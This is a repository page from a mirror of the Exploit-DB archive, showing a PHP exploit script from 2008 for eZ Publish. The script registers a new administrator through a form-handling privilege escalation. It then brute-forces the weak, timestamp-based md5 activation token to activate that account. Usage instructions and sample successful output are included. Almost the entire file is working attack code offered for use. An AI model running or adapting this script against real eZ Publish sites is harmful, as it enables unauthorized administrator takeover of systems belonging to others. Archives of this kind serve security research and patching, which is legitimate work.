bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/7473.php
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

181 lines
4.9 KiB
PHP
Executable file
Raw Blame History

<?php
/*
eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru]
Versions affected >= 3.5.6
eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1
More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
eZ Publish weak activation token for new user not resolved now (zero-day).
Vulnerable code in the version 3.9.2:
$hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) );
Vulnerable code in the version 4.0.1:
$hash = md5( time() . $user->attribute( 'contentobject_id' ) );
* tested on version 3.9.2
usage:
# ./eZPublish_create_admin_exploit.php -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]
The options are required:
-u Login of the new admin on eZ Publish
-p Password of the new admin on eZ Publish
-s Target for privilege escalation
The options are optional:
-t Unix timestamp for a date on target eZ Publish server
This option is required in a case when on a target server incorrect time is established.
Default is unix timestamp for a date on local computer.
-e Email of the new admin on eZ Publish
Default is anybody@localhost.localhost.
example:
# ./eZPublish_create_admin_exploit.php -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -e=my_mail@google.com -t=1229194235
[+] Phase 1 successfully finished
[+] Use timestamp: 1229194235
[+] Begin bruteforce...
....................
[+] Phase 2 successfully finished
[+] Exploiting is finished successfully
[+] Login in system using admin/P@ssw0rd
*/
function help_argc($script_name)
{
print "
usage:
# ./".$script_name." -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]
The options are required:
-u Login of the new admin on eZ Publish
-p Password of the new admin on eZ Publish
-s Target for privilege escalation
The options are optional:
-t Unix timestamp for a date on target eZ Publish server
(default is unix timestamp for a date on local computer)
-e Email of the new admin on eZ Publish
(default is anybody@localhost.localhost)
example:
# ./".$script_name." -u=admin -p=P@ssw0rd -s=http://127.0.0.1/
[+] Phase 1 successfully finished
[+] Use timestamp: 1229194235
[+] Begin bruteforce...
....................
[+] Phase 2 successfully finished
[+] Exploiting is finished successfully
[+] Login in system using admin/P@ssw0rd
";
}
function successfully($login,$password)
{
print "
[+] Phase 2 successfully finished
[+] Exploiting is finished successfully
[+] Login in system using $login/$password
";
}
if (($argc != 4 && $argc != 5 && $argc != 6) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
help_argc($argv[0]);
exit(0);
}
else
{
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg,1,1);
if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
}
}
if ($ARG[u] && $ARG[p] && $ARG[s])
{
if (!$ARG[e]) $ARG[e] = "anybody@localhost.localhost";
$post_fields = array(
'ContentObjectAttribute_data_user_login_30' => $ARG[u],
'ContentObjectAttribute_data_user_password_30' => $ARG[p],
'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
'ContentObjectAttribute_data_user_email_30' => $ARG[e],
'UserID' => '14',
'PublishButton' => '1'
);
$headers = array(
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
'Referer' => $ARG[s]
);
$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
$res_http->addPostFields($post_fields);
$res_http->addHeaders($headers);
try {
if ($ARG[t]) { $time = $ARG[t]; } else { $time = mktime( ); }
$response = $res_http->send()->getBody();
if (eregi("success", $response) || eregi("Fatal error", $response))
{
print "[+] Phase 1 successfully finished\n";
print "[+] Use timestamp: $time\n";
print "[+] Begin bruteforce...\n";
for ($i = $time; $i<$time+100; $i++)
{
print ".";
$hash = md5( $i . "14" );
$res_http = new HttpRequest($ARG[s]."/user/activate/".$hash, HttpRequest::METH_GET);
$res_http->addHeaders($headers);
try {
$response = $res_http->send()->getBody();
if (eregi("Your account is now activated", $response))
{
successfully($ARG[u],$ARG[p]);
exit(1);
}
} catch (HttpException $exception) {
print "\n[-] Not connected";
exit(0);
}
}
print "\n[-] Exploit failed";
}
else
{
print "[-] Exploit failed";
}
} catch (HttpException $exception) {
print "[-] Not connected";
exit(0);
}
}
else
{
help_argc($argv[0]);
exit(0);
}
}
?>
# milw0rm.com [2008-12-15]
Reference in a new issue View git blame Copy permalink